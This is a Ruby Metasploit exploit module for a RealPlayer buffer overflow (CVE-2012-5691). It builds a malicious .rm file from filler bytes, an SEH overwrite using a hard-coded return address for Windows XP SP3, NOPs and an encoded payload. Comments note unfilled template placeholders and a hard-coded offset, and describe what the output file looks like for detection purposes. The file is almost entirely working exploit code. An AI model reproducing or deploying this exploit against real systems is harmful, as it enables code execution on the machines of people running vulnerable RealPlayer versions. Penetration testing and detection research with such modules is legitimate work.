- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # Framework web site for more information on licensing and terms of use.
- # http://metasploit.com/framework/
- ##
- require 'msf/core'
# Metasploit file-format module for the RealPlayer buffer overflow tracked as
# CVE-2012-5691 (see 'References' below). The 'Description' states that
# Windows RealPlayer 15.0.6.14 and prior are affected; the vendor security
# advisory URL in 'References' is the remediation pointer for that version.
# The generated file is written to disk via Msf::Exploit::FILEFORMAT; nothing
# here talks to a remote host.
class Metasploit3 < Msf::Exploit::Remote
  # Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
  # ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
  Rank = NormalRanking
  include Msf::Exploit::FILEFORMAT # provides file_create (used in #exploit)
  include Msf::Exploit::Seh        # provides generate_seh_record (used in #exploit)

  # Registers the module metadata and the FILENAME option.
  #
  # Several module-template placeholders were never filled in and should be
  # fixed before this module is considered complete: the OSVDB reference is
  # still '<insert OSVDB number here>', 'DisclosureDate' is the literal
  # 'MONTH DAY YEAR' (not a valid "M D Y" date), and 'BadChars' still carries
  # the template's "<change if needed>" note.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealPlayer BoF 0Day',
      'Description'    => %q{
        Buffer overflow with RealMedia files vulnerability
        Affected software: Windows RealPlayer 15.0.6.14 and prior.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'suto(https://twitter.com/toanphamvan) ', # Original discovery
          'trongnguyen0205@gmail.com', # MSF Module
        ],
      'References'     =>
        [
          [ 'OSVDB', '<insert OSVDB number here>' ], # placeholder: not yet filled in
          [ 'CVE', 'CVE-2012-5691' ],
          [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ] # vendor advisory / fix
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', # none/process/thread/seh
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x0d", # <change if needed>
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Ret'    => 0x5acd5121,
              # NOTE(review): 'Offset' is declared here but #exploit hard-codes
              # 2312 instead of reading target['Offset']; the two can drift apart.
              'Offset' => 2312
            }
          ], # pop ebx # pop esi # ret - rpap3260.dll
        ],
      'Privileged'     => false,
      # Correct Date Format: "M D Y"
      # Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
      'DisclosureDate' => 'MONTH DAY YEAR', # placeholder: still the template value
      'DefaultTarget'  => 0))
    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)
  end

  # Builds the file and writes it with file_create.
  #
  # Layout, as assembled below: an "[InternetShortcut]\nURL=" header, 2312
  # filler bytes, the SEH record built from target.ret, 30 NOPs, the encoded
  # payload, then 5000 trailing bytes. From a detection standpoint, a file
  # with the .rm default name whose body starts with an [InternetShortcut]
  # header followed by long runs of a single repeated byte is the
  # characteristic shape of this module's output.
  def exploit
    content = "[InternetShortcut]\nURL="
    buffer = "A"*2312 # hard-coded; matches target['Offset'] today but is not read from it
    buffer << generate_seh_record(target.ret)
    buffer << make_nops(30)
    buffer << payload.encoded # 522 bytes of space (per the original author's note)
    filecontent = content+buffer+"B"*5000
    file_create(filecontent)
  end
end